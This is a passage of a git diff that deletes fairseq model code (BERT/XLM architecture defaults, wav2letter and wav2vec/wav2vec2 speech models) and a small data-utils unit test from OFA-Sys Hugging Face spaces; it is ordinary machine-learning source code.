"act_dropout", 0.0) - - args.encoder_ffn_embed_dim = getattr(args, "encoder_ffn_embed_dim", 4096) - args.encoder_layers = getattr(args, "encoder_layers", 6) - args.encoder_attention_heads = getattr(args, "encoder_attention_heads", 8) - - args.encoder_embed_dim = getattr(args, "encoder_embed_dim", 1024) - args.share_encoder_input_output_embed = getattr( - args, "share_encoder_input_output_embed", False - ) - args.encoder_learned_pos = getattr(args, "encoder_learned_pos", False) - args.no_token_positional_embeddings = getattr( - args, "no_token_positional_embeddings", False - ) - args.num_segment = getattr(args, "num_segment", 2) - - args.sentence_class_num = getattr(args, "sentence_class_num", 2) - args.sent_loss = getattr(args, "sent_loss", False) - - args.apply_bert_init = getattr(args, "apply_bert_init", False) - - args.activation_fn = getattr(args, "activation_fn", "relu") - args.pooler_activation_fn = getattr(args, "pooler_activation_fn", "tanh") - args.encoder_normalize_before = getattr(args, "encoder_normalize_before", False) - - -@register_model_architecture("masked_lm", "bert_base") -def bert_base_architecture(args): - args.encoder_embed_dim = getattr(args, "encoder_embed_dim", 768) - args.share_encoder_input_output_embed = getattr( - args, "share_encoder_input_output_embed", True - ) - args.no_token_positional_embeddings = getattr( - args, "no_token_positional_embeddings", False - ) - args.encoder_learned_pos = getattr(args, "encoder_learned_pos", True) - args.num_segment = getattr(args, "num_segment", 2) - - args.encoder_layers = getattr(args, "encoder_layers", 12) - - args.encoder_attention_heads = getattr(args, "encoder_attention_heads", 12) - args.encoder_ffn_embed_dim = getattr(args, 
"encoder_ffn_embed_dim", 3072) - - args.sentence_class_num = getattr(args, "sentence_class_num", 2) - args.sent_loss = getattr(args, "sent_loss", True) - - args.apply_bert_init = getattr(args, "apply_bert_init", True) - - args.activation_fn = getattr(args, "activation_fn", "gelu") - args.pooler_activation_fn = getattr(args, "pooler_activation_fn", "tanh") - args.encoder_normalize_before = getattr(args, "encoder_normalize_before", True) - base_architecture(args) - - -@register_model_architecture("masked_lm", "bert_large") -def bert_large_architecture(args): - args.encoder_embed_dim = getattr(args, "encoder_embed_dim", 1024) - args.encoder_layers = getattr(args, "encoder_layers", 24) - args.encoder_attention_heads = getattr(args, "encoder_attention_heads", 16) - args.encoder_ffn_embed_dim = getattr(args, "encoder_ffn_embed_dim", 4096) - bert_base_architecture(args) - - -@register_model_architecture("masked_lm", "xlm_base") -def xlm_architecture(args): - args.encoder_embed_dim = getattr(args, "encoder_embed_dim", 1024) - args.share_encoder_input_output_embed = getattr( - args, "share_encoder_input_output_embed", True - ) - args.no_token_positional_embeddings = getattr( - args, "no_token_positional_embeddings", False - ) - args.encoder_learned_pos = getattr(args, "encoder_learned_pos", True) - args.num_segment = getattr(args, "num_segment", 1) - - args.encoder_layers = getattr(args, "encoder_layers", 6) - - args.encoder_attention_heads = getattr(args, "encoder_attention_heads", 8) - args.encoder_ffn_embed_dim = getattr(args, "encoder_ffn_embed_dim", 4096) - - args.sent_loss = getattr(args, "sent_loss", False) - - args.activation_fn = getattr(args, "activation_fn", "gelu") - args.encoder_normalize_before = getattr(args, "encoder_normalize_before", False) - args.pooler_activation_fn = getattr(args, "pooler_activation_fn", "tanh") - args.apply_bert_init = getattr(args, "apply_bert_init", True) - base_architecture(args) diff --git a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/tests/speech_recognition/test_data_utils.py b/spaces/OFA-Sys/OFA-Image_Caption/fairseq/tests/speech_recognition/test_data_utils.py deleted file mode 100644 index a72e0b66948da1349d87eafdef4c4004dd535c96..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/tests/speech_recognition/test_data_utils.py +++ /dev/null @@ -1,62 +0,0 @@ -#!/usr/bin/env python3 -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
-import unittest - -import torch -from examples.speech_recognition.data import data_utils - - -class DataUtilsTest(unittest.TestCase): - def test_normalization(self): - sample_len1 = torch.tensor( - [ - [ - -0.7661, - -1.3889, - -2.0972, - -0.9134, - -0.7071, - -0.9765, - -0.8700, - -0.8283, - 0.7512, - 1.3211, - 2.1532, - 2.1174, - 1.2800, - 1.2633, - 1.6147, - 1.6322, - 2.0723, - 3.1522, - 3.2852, - 2.2309, - 2.5569, - 2.2183, - 2.2862, - 1.5886, - 0.8773, - 0.8725, - 1.2662, - 0.9899, - 1.1069, - 1.3926, - 1.2795, - 1.1199, - 1.1477, - 1.2687, - 1.3843, - 1.1903, - 0.8355, - 1.1367, - 1.2639, - 1.4707, - ] - ] - ) - out = data_utils.apply_mv_norm(sample_len1) - assert not torch.isnan(out).any() - assert (out == sample_len1).all() diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/examples/speech_recognition/models/w2l_conv_glu_enc.py b/spaces/OFA-Sys/OFA-vqa/fairseq/examples/speech_recognition/models/w2l_conv_glu_enc.py deleted file mode 100644 index 655a9b0d19d11e35511392a016f9d6b7d7aa2925..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-vqa/fairseq/examples/speech_recognition/models/w2l_conv_glu_enc.py +++ /dev/null @@ -1,177 +0,0 @@ -#!/usr/bin/env python3 - -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import math - -import torch -import torch.nn as nn -import torch.nn.functional as F -from fairseq.models import ( - FairseqEncoder, - FairseqEncoderModel, - register_model, - register_model_architecture, -) -from fairseq.modules.fairseq_dropout import FairseqDropout - - -default_conv_enc_config = """[ - (400, 13, 170, 0.2), - (440, 14, 0, 0.214), - (484, 15, 0, 0.22898), - (532, 16, 0, 0.2450086), - (584, 17, 0, 0.262159202), - (642, 18, 0, 0.28051034614), - (706, 19, 0, 0.30014607037), - (776, 20, 0, 0.321156295296), - (852, 21, 0, 0.343637235966), - (936, 22, 0, 0.367691842484), - (1028, 23, 0, 0.393430271458), - (1130, 24, 0, 0.42097039046), - (1242, 25, 0, 0.450438317792), - (1366, 26, 0, 0.481969000038), - (1502, 27, 0, 0.51570683004), - (1652, 28, 0, 0.551806308143), - (1816, 29, 0, 0.590432749713), -]""" - - -@register_model("asr_w2l_conv_glu_encoder") -class W2lConvGluEncoderModel(FairseqEncoderModel): - def __init__(self, encoder): - super().__init__(encoder) - - @staticmethod - def add_args(parser): - """Add model-specific arguments to the parser.""" - parser.add_argument( - "--input-feat-per-channel", - type=int, - metavar="N", - help="encoder input dimension per input channel", - ) - parser.add_argument( - "--in-channels", - type=int, - metavar="N", - help="number of encoder input channels", - ) - parser.add_argument( - "--conv-enc-config", - type=str, - metavar="EXPR", - help=""" - an array of tuples each containing the configuration of one conv layer - [(out_channels, kernel_size, padding, dropout), ...] 
- """, - ) - - @classmethod - def build_model(cls, args, task): - """Build a new model instance.""" - conv_enc_config = getattr(args, "conv_enc_config", default_conv_enc_config) - encoder = W2lConvGluEncoder( - vocab_size=len(task.target_dictionary), - input_feat_per_channel=args.input_feat_per_channel, - in_channels=args.in_channels, - conv_enc_config=eval(conv_enc_config), - ) - return cls(encoder) - - def get_normalized_probs(self, net_output, log_probs, sample=None): - lprobs = super().get_normalized_probs(net_output, log_probs, sample) - lprobs.batch_first = False - return lprobs - - -class W2lConvGluEncoder(FairseqEncoder): - def __init__( - self, vocab_size, input_feat_per_channel, in_channels, conv_enc_config - ): - super().__init__(None) - - self.input_dim = input_feat_per_channel - if in_channels != 1: - raise ValueError("only 1 input channel is currently supported") - - self.conv_layers = nn.ModuleList() - self.linear_layers = nn.ModuleList() - self.dropouts = [] - cur_channels = input_feat_per_channel - - for out_channels, kernel_size, padding, dropout in conv_enc_config: - layer = nn.Conv1d(cur_channels, out_channels, kernel_size, padding=padding) - layer.weight.data.mul_(math.sqrt(3)) # match wav2letter init - self.conv_layers.append(nn.utils.weight_norm(layer)) - self.dropouts.append( - FairseqDropout(dropout, module_name=self.__class__.__name__) - ) - if out_channels % 2 != 0: - raise ValueError("odd # of out_channels is incompatible with GLU") - cur_channels = out_channels // 2 # halved by GLU - - for out_channels in [2 * cur_channels, vocab_size]: - layer = nn.Linear(cur_channels, out_channels) - layer.weight.data.mul_(math.sqrt(3)) - self.linear_layers.append(nn.utils.weight_norm(layer)) - cur_channels = out_channels // 2 - - def forward(self, src_tokens, src_lengths, **kwargs): - - """ - src_tokens: padded tensor (B, T, C * feat) - src_lengths: tensor of original lengths of input utterances (B,) - """ - B, T, _ = src_tokens.size() - x = src_tokens.transpose(1, 2).contiguous() # (B, feat, T) assuming C == 1 - - for layer_idx in range(len(self.conv_layers)): - x = self.conv_layers[layer_idx](x) - x = F.glu(x, dim=1) - x = self.dropouts[layer_idx](x) - - x = x.transpose(1, 2).contiguous() # (B, T, 908) - x = self.linear_layers[0](x) - x = F.glu(x, dim=2) - x = self.dropouts[-1](x) - x = self.linear_layers[1](x) - - assert x.size(0) == B - assert x.size(1) == T - - encoder_out = x.transpose(0, 1) # (T, B, vocab_size) - - # need to debug this -- find a simpler/elegant way in pytorch APIs - encoder_padding_mask = ( - torch.arange(T).view(1, T).expand(B, -1).to(x.device) - >= src_lengths.view(B, 1).expand(-1, T) - ).t() # (B x T) -> (T x B) - - return { - "encoder_out": encoder_out, # (T, B, vocab_size) - "encoder_padding_mask": encoder_padding_mask, # (T, B) - } - - def reorder_encoder_out(self, encoder_out, new_order): - encoder_out["encoder_out"] = encoder_out["encoder_out"].index_select( - 1, new_order - ) - encoder_out["encoder_padding_mask"] = encoder_out[ - "encoder_padding_mask" - ].index_select(1, new_order) - return encoder_out - - def max_positions(self): - """Maximum input length supported by the encoder.""" - return (1e6, 1e6) # an arbitrary large number - - -@register_model_architecture("asr_w2l_conv_glu_encoder", "w2l_conv_glu_enc") -def w2l_conv_glu_enc(args): - args.input_feat_per_channel = getattr(args, "input_feat_per_channel", 80) - args.in_channels = getattr(args, "in_channels", 1) - args.conv_enc_config = getattr(args, "conv_enc_config", 
default_conv_enc_config) diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/models/wav2vec/wav2vec.py b/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/models/wav2vec/wav2vec.py deleted file mode 100644 index af6604da10f504baabff50bf14a6eb2214bffef3..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/models/wav2vec/wav2vec.py +++ /dev/null @@ -1,630 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from dataclasses import dataclass, field -import logging -import math -from typing import Optional, Tuple -from omegaconf import II -import sys - -import torch -import torch.nn as nn -import torch.nn.functional as F -from fairseq.dataclass import ChoiceEnum, FairseqDataclass -from fairseq.models import BaseFairseqModel, register_model -from fairseq.modules import ( - Fp32GroupNorm, - Fp32LayerNorm, - GumbelVectorQuantizer, - KmeansVectorQuantizer, - TransposeLast, -) -from fairseq.tasks import FairseqTask -from fairseq.utils import buffered_arange - - -logger = logging.getLogger(__name__) - - -AGGREGATOR_CHOICES = ChoiceEnum(["cnn", "gru"]) -PROJECT_FEATURES_CHOICES = ChoiceEnum(["none", "same", "new"]) -ACTIVATION_CHOICES = ChoiceEnum(["relu", "gelu"]) -VQ_TYPE_CHOICES = ChoiceEnum(["none", "gumbel", "kmeans"]) - - -@dataclass -class Wav2VecConfig(FairseqDataclass): - prediction_steps: int = field( - default=12, metadata={"help": "number of steps ahead to predict"} - ) - sample_distance: Optional[int] = field( - default=None, - metadata={ - "help": "sample distance from target. does not work properly with cross-sampling" - }, - ) - cross_sample_negatives: int = field( - default=0, metadata={"help": "num of cross sampled negatives"} - ) - num_negatives: int = field( - default=10, metadata={"help": "num of sampled negatives"} - ) - conv_feature_layers: str = field( - default="[(512, 10, 5), (512, 8, 4), (512, 4, 2), (512, 4, 2), (512, 4, 2), (512, 1, 1), (512, 1, 1), (512, 1, 1)]", - metadata={ - "help": "convolutional feature extraction layers [(dim, kernel_size, stride), ...]" - }, - ) - conv_aggregator_layers: str = field( - default="[(512, 2, 1), (512, 3, 1), (512, 4, 1), (512, 5, 1), (512, 6, 1), (512, 7, 1), (512, 8, 1), (512, 9, 1), (512, 10, 1), (512, 11, 1), (512, 12, 1), (512, 13, 1)]", - metadata={ - "help": "convolutional aggregator layers [(dim, kernel_size, stride), ...]" - }, - ) - dropout: float = field( - default=0.0, metadata={"help": "dropout to apply within the model"} - ) - dropout_features: float = field( - default=0.0, metadata={"help": "dropout to apply to the features"} - ) - dropout_agg: float = field( - default=0.0, metadata={"help": "dropout to apply after aggregation step"} - ) - aggregator: AGGREGATOR_CHOICES = field( - default="cnn", metadata={"help": "type of aggregator to use"} - ) - gru_dim: int = field(default=512, metadata={"help": "GRU dimensionality"}) - no_conv_bias: bool = field( - default=False, metadata={"help": "if set, does not learn bias for conv layers"} - ) - agg_zero_pad: bool = field( - default=False, - metadata={"help": "if set, zero pads in aggregator instead of repl pad"}, - ) - skip_connections_feat: bool = field( - default=False, - metadata={"help": "if set, adds skip connections to the feature extractor"}, - ) - skip_connections_agg: bool = field( - default=True, - metadata={"help": "if set, adds skip connections to the aggregator"}, - ) - residual_scale: float = field( - 
default=0.5, metadata={"help": "scales residual by sqrt(value)"} - ) - log_compression: bool = field( - default=True, - metadata={"help": "if set, adds a log compression to feature extractor"}, - ) - balanced_classes: bool = field( - default=False, - metadata={"help": "if set, loss is scaled to balance for number of negatives"}, - ) - project_features: PROJECT_FEATURES_CHOICES = field( - default="none", - metadata={ - "help": "if not none, features are projected using the (same or new) aggregator" - }, - ) - non_affine_group_norm: bool = field( - default=False, metadata={"help": "if set, group norm is not affine"} - ) - offset: str = field( - default="auto", - metadata={ - "help": "if set to 'auto', it is computed automatically from the receptive field, else set to int value" - }, - ) - activation: ACTIVATION_CHOICES = field( - default="relu", - metadata={ - "help": "if set to 'auto', it is computed automatically from the receptive field, else set to int value" - }, - ) - vq_type: VQ_TYPE_CHOICES = field( - default="none", metadata={"help": "which type of quantizer to use"} - ) - vq_vars: int = field( - default=320, - metadata={"help": "project to this many vector quantized variables per group"}, - ) - vq_groups: int = field( - default=2, metadata={"help": "number of groups of latent variables"} - ) - vq_dim: int = field( - default=0, - metadata={ - "help": "uses this dimensionality for quantized vectors. 0 to use model dim // groups" - }, - ) - vq_depth: int = field( - default=1, metadata={"help": "number of layers for vq weight projection"} - ) - combine_groups: bool = field( - default=False, metadata={"help": "if set, variables are shared among groups"} - ) - vq_temp: Tuple[float, float, float] = field( - default=(2.0, 0.5, 0.999995), - metadata={ - "help": "temperature for latent variable sampling with gumbel softmax. 
should be a tuple of 3 values (start, end, decay)" - }, - ) - vq_gamma: float = field( - default=0.25, - metadata={"help": "gamma parameter for kmeans style vector quantization"}, - ) - infonce: bool = II("criterion.infonce") - - -@register_model("wav2vec", dataclass=Wav2VecConfig) -class Wav2VecModel(BaseFairseqModel): - @classmethod - def build_model(cls, cfg: Wav2VecConfig, task: FairseqTask): - """Build a new model instance.""" - - model = Wav2VecModel(cfg) - logger.info(model) - return model - - def __init__(self, cfg: Wav2VecConfig): - super().__init__() - - self.prediction_steps = cfg.prediction_steps - offset = cfg.offset - - if cfg.activation == "relu": - activation = nn.ReLU() - elif cfg.activation == "gelu": - activation = nn.GELU() - else: - raise Exception("unknown activation " + cfg.activation) - - feature_enc_layers = eval(cfg.conv_feature_layers) - self.feature_extractor = ConvFeatureExtractionModel( - conv_layers=feature_enc_layers, - dropout=0.0, - log_compression=cfg.log_compression, - skip_connections=cfg.skip_connections_feat, - residual_scale=cfg.residual_scale, - non_affine_group_norm=cfg.non_affine_group_norm, - activation=activation, - ) - embed = feature_enc_layers[-1][0] - - self.vector_quantizer = None - if cfg.vq_type == "gumbel": - self.vector_quantizer = GumbelVectorQuantizer( - dim=embed, - num_vars=cfg.vq_vars, - temp=cfg.vq_temp, - groups=cfg.vq_groups, - combine_groups=cfg.combine_groups, - vq_dim=cfg.vq_dim if cfg.vq_dim > 0 else embed, - time_first=False, - activation=activation, - weight_proj_depth=cfg.vq_depth, - weight_proj_factor=2, - ) - elif cfg.vq_type == "kmeans": - self.vector_quantizer = KmeansVectorQuantizer( - dim=embed, - num_vars=cfg.vq_vars, - groups=cfg.vq_groups, - combine_groups=cfg.combine_groups, - vq_dim=cfg.vq_dim if cfg.vq_dim > 0 else embed, - time_first=False, - gamma=cfg.vq_gamma, - ) - else: - assert ( - cfg.vq_type == "none" or cfg.vq_type is None - ), "Unknown quantizer type" - - if cfg.offset == "auto": - jin = 0 - rin = 0 - for _, k, stride in feature_enc_layers: - if rin == 0: - rin = k - rin = rin + (k - 1) * jin - if jin == 0: - jin = stride - else: - jin *= stride - offset = math.ceil(rin / jin) - - offset = int(offset) - - def make_aggregator(): - if cfg.aggregator == "cnn": - agg_layers = eval(cfg.conv_aggregator_layers) - agg_dim = agg_layers[-1][0] - feature_aggregator = ConvAggegator( - conv_layers=agg_layers, - embed=embed, - dropout=cfg.dropout, - skip_connections=cfg.skip_connections_agg, - residual_scale=cfg.residual_scale, - non_affine_group_norm=cfg.non_affine_group_norm, - conv_bias=not cfg.no_conv_bias, - zero_pad=cfg.agg_zero_pad, - activation=activation, - ) - elif cfg.aggregator == "gru": - agg_dim = cfg.gru_dim - feature_aggregator = nn.Sequential( - TransposeLast(), - nn.GRU( - input_size=embed, - hidden_size=agg_dim, - num_layers=1, - dropout=cfg.dropout, - ), - TransposeLast(deconstruct_idx=0), - ) - else: - raise Exception("unknown aggregator type " + cfg.aggregator) - - return feature_aggregator, agg_dim - - self.feature_aggregator, agg_dim = make_aggregator() - - self.wav2vec_predictions = Wav2VecPredictionsModel( - in_dim=agg_dim, - out_dim=embed, - prediction_steps=cfg.prediction_steps, - n_negatives=cfg.num_negatives, - cross_sample_negatives=cfg.cross_sample_negatives, - sample_distance=cfg.sample_distance, - dropout=cfg.dropout, - offset=offset, - balanced_classes=cfg.balanced_classes, - infonce=cfg.infonce, - ) - - self.dropout_feats = nn.Dropout(p=cfg.dropout_features) - self.dropout_agg = 
nn.Dropout(p=cfg.dropout_agg) - - if cfg.project_features == "none": - self.project_features = None - elif cfg.project_features == "same": - self.project_features = self.feature_aggregator - elif cfg.project_features == "new": - self.project_features, _ = make_aggregator() - - def forward(self, source): - result = {} - - features = self.feature_extractor(source) - if self.vector_quantizer: - q_res = self.vector_quantizer(features) - features = q_res["x"] - for k in q_res.keys(): - if k != "x": - result[k] = q_res[k] - - x = self.dropout_feats(features) - x = self.feature_aggregator(x) - x = self.dropout_agg(x) - - if self.project_features is not None: - features = self.project_features(features) - x, targets = self.wav2vec_predictions(x, features) - result["cpc_logits"] = x - result["cpc_targets"] = targets - - return result - - def upgrade_state_dict_named(self, state_dict, name): - super().upgrade_state_dict_named(state_dict, name) - - def max_positions(self): - """Maximum length supported by the model.""" - return sys.maxsize - - def get_logits(self, net_output): - logits = net_output["cpc_logits"] - return logits - - def get_targets(self, sample, net_output): - t = net_output["cpc_targets"] - if isinstance(t, tuple): - t = t[0] - return t.contiguous() - - def get_target_weights(self, targets, net_output): - targets = net_output["cpc_targets"] - if isinstance(targets, tuple) and targets[-1] is not None: - return targets[-1] - return None - - def get_extra_losses(self, net_output): - loss = None - if "prob_perplexity" in net_output: - loss = net_output["num_vars"] - net_output["prob_perplexity"] - elif "kmeans_loss" in net_output: - loss = net_output["kmeans_loss"] - - return loss - - -def norm_block(is_layer_norm, dim, affine=True): - if is_layer_norm: - mod = nn.Sequential( - TransposeLast(), - Fp32LayerNorm(dim, elementwise_affine=affine), - TransposeLast(), - ) - else: - mod = Fp32GroupNorm(1, dim, affine=affine) - - return mod - - -class ConvFeatureExtractionModel(nn.Module): - def __init__( - self, - conv_layers, - dropout, - log_compression, - skip_connections, - residual_scale, - non_affine_group_norm, - activation, - ): - super().__init__() - - def block(n_in, n_out, k, stride): - return nn.Sequential( - nn.Conv1d(n_in, n_out, k, stride=stride, bias=False), - nn.Dropout(p=dropout), - norm_block( - is_layer_norm=False, dim=n_out, affine=not non_affine_group_norm - ), - activation, - ) - - in_d = 1 - self.conv_layers = nn.ModuleList() - for dim, k, stride in conv_layers: - self.conv_layers.append(block(in_d, dim, k, stride)) - in_d = dim - - self.log_compression = log_compression - self.skip_connections = skip_connections - self.residual_scale = math.sqrt(residual_scale) - - def forward(self, x): - # BxT -> BxCxT - x = x.unsqueeze(1) - - for conv in self.conv_layers: - residual = x - x = conv(x) - if self.skip_connections and x.size(1) == residual.size(1): - tsz = x.size(2) - r_tsz = residual.size(2) - residual = residual[..., :: r_tsz // tsz][..., :tsz] - x = (x + residual) * self.residual_scale - - if self.log_compression: - x = x.abs() - x = x + 1 - x = x.log() - - return x - - -class ZeroPad1d(nn.Module): - def __init__(self, pad_left, pad_right): - super().__init__() - self.pad_left = pad_left - self.pad_right = pad_right - - def forward(self, x): - return F.pad(x, (self.pad_left, self.pad_right)) - - -class ConvAggegator(nn.Module): - def __init__( - self, - conv_layers, - embed, - dropout, - skip_connections, - residual_scale, - non_affine_group_norm, - conv_bias, - 
zero_pad, - activation, - ): - super().__init__() - - def block(n_in, n_out, k, stride): - # padding dims only really make sense for stride = 1 - ka = k // 2 - kb = ka - 1 if k % 2 == 0 else ka - - pad = ( - ZeroPad1d(ka + kb, 0) if zero_pad else nn.ReplicationPad1d((ka + kb, 0)) - ) - - return nn.Sequential( - pad, - nn.Conv1d(n_in, n_out, k, stride=stride, bias=conv_bias), - nn.Dropout(p=dropout), - norm_block(False, n_out, affine=not non_affine_group_norm), - activation, - ) - - in_d = embed - self.conv_layers = nn.ModuleList() - self.residual_proj = nn.ModuleList() - for dim, k, stride in conv_layers: - if in_d != dim and skip_connections: - self.residual_proj.append(nn.Conv1d(in_d, dim, 1, bias=False)) - else: - self.residual_proj.append(None) - - self.conv_layers.append(block(in_d, dim, k, stride)) - in_d = dim - self.conv_layers = nn.Sequential(*self.conv_layers) - self.skip_connections = skip_connections - self.residual_scale = math.sqrt(residual_scale) - - def forward(self, x): - for rproj, conv in zip(self.residual_proj, self.conv_layers): - residual = x - x = conv(x) - if self.skip_connections: - if rproj is not None: - residual = rproj(residual) - x = (x + residual) * self.residual_scale - return x - - -class Wav2VecPredictionsModel(nn.Module): - def __init__( - self, - in_dim, - out_dim, - prediction_steps, - n_negatives, - cross_sample_negatives, - sample_distance, - dropout, - offset, - balanced_classes, - infonce, - ): - super().__init__() - - self.n_negatives = n_negatives - self.cross_sample_negatives = cross_sample_negatives - self.sample_distance = sample_distance - self.project_to_steps = nn.ConvTranspose2d( - in_dim, out_dim, (1, prediction_steps) - ) - self.dropout = nn.Dropout(p=dropout) - self.offset = offset - self.balanced_classes = balanced_classes - self.infonce = infonce - - def sample_negatives(self, y): - bsz, fsz, tsz = y.shape - - y = y.transpose(0, 1) # BCT -> CBT - y = y.contiguous().view(fsz, -1) # CBT => C(BxT) - - cross_high = tsz * bsz - high = tsz if self.sample_distance is None else min(tsz, self.sample_distance) - assert high > 1 - - neg_idxs = torch.randint(low=0, high=high, size=(bsz, self.n_negatives * tsz)) - - with torch.no_grad(): - if self.n_negatives > 0: - tszs = ( - buffered_arange(tsz) - .unsqueeze(-1) - .expand(-1, self.n_negatives) - .flatten() - ) - - neg_idxs = torch.randint( - low=0, high=high - 1, size=(bsz, self.n_negatives * tsz) - ) - neg_idxs[neg_idxs >= tszs] += 1 - - if self.cross_sample_negatives > 0: - tszs = ( - buffered_arange(tsz) - .unsqueeze(-1) - .expand(-1, self.cross_sample_negatives) - .flatten() - ) - - cross_neg_idxs = torch.randint( - low=0, - high=cross_high - 1, - size=(bsz, self.cross_sample_negatives * tsz), - ) - cross_neg_idxs[cross_neg_idxs >= tszs] += 1 - - if self.n_negatives > 0: - for i in range(1, bsz): - neg_idxs[i] += i * high - else: - neg_idxs = cross_neg_idxs - - if self.cross_sample_negatives > 0 and self.n_negatives > 0: - neg_idxs = torch.cat([neg_idxs, cross_neg_idxs], dim=1) - - negs = y[..., neg_idxs.view(-1)] - negs = negs.view( - fsz, bsz, self.n_negatives + self.cross_sample_negatives, tsz - ).permute( - 2, 1, 0, 3 - ) # to NxBxCxT - - return negs - - def forward(self, x, y): - - x = x.unsqueeze(-1) - x = self.project_to_steps(x) # BxCxTxS - x = self.dropout(x) - - negatives = self.sample_negatives(y) - y = y.unsqueeze(0) - targets = torch.cat([y, negatives], dim=0) # Copies x B x C x T - - copies = targets.size(0) - bsz, dim, tsz, steps = x.shape - steps = min(steps, tsz - 
self.offset) - - predictions = x.new( - bsz * copies * (tsz - self.offset + 1) * steps - - ((steps + 1) * steps // 2) * copies * bsz - ) - if self.infonce: - labels = predictions.new_full( - (predictions.shape[0] // copies,), 0, dtype=torch.long - ) - else: - labels = torch.zeros_like(predictions) - weights = ( - torch.full_like(labels, 1 / self.n_negatives) - if self.balanced_classes and not self.infonce - else None - ) - - start = end = 0 - for i in range(steps): - offset = i + self.offset - end = start + (tsz - offset) * bsz * copies - if self.infonce: - predictions[start:end] = torch.einsum( - "bct,nbct->tbn", x[..., :-offset, i], targets[..., offset:] - ).flatten() - else: - pos_num = (end - start) // copies - predictions[start:end] = torch.einsum( - "bct,nbct->nbt", x[..., :-offset, i], targets[..., offset:] - ).flatten() - labels[start : start + pos_num] = 1.0 - if weights is not None: - weights[start : start + pos_num] = 1.0 - start = end - assert end == predictions.numel(), "{} != {}".format(end, predictions.numel()) - - if self.infonce: - predictions = predictions.view(-1, copies) - else: - if weights is not None: - labels = (labels, weights) - - return predictions, labels diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/models/wav2vec/wav2vec2.py b/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/models/wav2vec/wav2vec2.py deleted file mode 100644 index 714fd3ab50443b8d15715b1cf5abd4eb517298c4..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/models/wav2vec/wav2vec2.py +++ /dev/null @@ -1,1016 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import math -from dataclasses import dataclass, field -from typing import List, Tuple - -import numpy as np -import torch -import torch.nn as nn -import torch.nn.functional as F -from fairseq import utils -from fairseq.data.data_utils import compute_mask_indices -from fairseq.dataclass import ChoiceEnum, FairseqDataclass -from fairseq.models import BaseFairseqModel, register_model -from fairseq.modules import ( - Fp32GroupNorm, - Fp32LayerNorm, - GradMultiply, - GumbelVectorQuantizer, - LayerNorm, - MultiheadAttention, - SamePad, - TransposeLast, -) -from fairseq.modules.transformer_sentence_encoder import init_bert_params -from fairseq.utils import buffered_arange, index_put, is_xla_tensor - - -EXTRACTOR_MODE_CHOICES = ChoiceEnum(["default", "layer_norm"]) -MASKING_DISTRIBUTION_CHOICES = ChoiceEnum(["static", "uniform", "normal", "poisson"]) - - -@dataclass -class Wav2Vec2Config(FairseqDataclass): - extractor_mode: EXTRACTOR_MODE_CHOICES = field( - default="default", - metadata={ - "help": "mode for feature extractor. 
default has a single group norm with d " - "groups in the first conv block, whereas layer_norm has layer norms in " - "every block (meant to use with normalize=True)" - }, - ) - encoder_layers: int = field( - default=12, metadata={"help": "num encoder layers in the transformer"} - ) - encoder_embed_dim: int = field( - default=768, metadata={"help": "encoder embedding dimension"} - ) - encoder_ffn_embed_dim: int = field( - default=3072, metadata={"help": "encoder embedding dimension for FFN"} - ) - encoder_attention_heads: int = field( - default=12, metadata={"help": "num encoder attention heads"} - ) - activation_fn: ChoiceEnum(utils.get_available_activation_fns()) = field( - default="gelu", metadata={"help": "activation function to use"} - ) - - # dropouts - dropout: float = field( - default=0.1, metadata={"help": "dropout probability for the transformer"} - ) - attention_dropout: float = field( - default=0.1, metadata={"help": "dropout probability for attention weights"} - ) - activation_dropout: float = field( - default=0.0, metadata={"help": "dropout probability after activation in FFN"} - ) - encoder_layerdrop: float = field( - default=0.0, metadata={"help": "probability of dropping a tarnsformer layer"} - ) - dropout_input: float = field( - default=0.0, - metadata={"help": "dropout to apply to the input (after feat extr)"}, - ) - dropout_features: float = field( - default=0.0, - metadata={"help": "dropout to apply to the features (after feat extr)"}, - ) - - final_dim: int = field( - default=0, - metadata={ - "help": "project final representations and targets to this many dimensions." - "set to encoder_embed_dim is <= 0" - }, - ) - layer_norm_first: bool = field( - default=False, metadata={"help": "apply layernorm first in the transformer"} - ) - conv_feature_layers: str = field( - default="[(512, 10, 5)] + [(512, 3, 2)] * 4 + [(512,2,2)] + [(512,2,2)]", - metadata={ - "help": "string describing convolutional feature extraction layers in form of a python list that contains " - "[(dim, kernel_size, stride), ...]" - }, - ) - conv_bias: bool = field( - default=False, metadata={"help": "include bias in conv encoder"} - ) - logit_temp: float = field( - default=0.1, metadata={"help": "temperature to divide logits by"} - ) - quantize_targets: bool = field( - default=False, metadata={"help": "use quantized targets"} - ) - quantize_input: bool = field( - default=False, metadata={"help": "use quantized inputs"} - ) - same_quantizer: bool = field( - default=False, metadata={"help": "use same quantizer for inputs and targets"} - ) - target_glu: bool = field( - default=False, metadata={"help": "adds projection + glu to targets"} - ) - feature_grad_mult: float = field( - default=1.0, metadata={"help": "multiply feature extractor var grads by this"} - ) - quantizer_depth: int = field( - default=1, - metadata={"help": "number of quantizer layers"}, - ) - quantizer_factor: int = field( - default=3, - metadata={ - "help": "dimensionality increase for inner quantizer layers (if depth > 1)" - }, - ) - latent_vars: int = field( - default=320, - metadata={"help": "number of latent variables V in each group of the codebook"}, - ) - latent_groups: int = field( - default=2, - metadata={"help": "number of groups G of latent variables in the codebook"}, - ) - latent_dim: int = field( - default=0, - metadata={ - "help": "if > 0, uses this dimensionality for latent variables. 
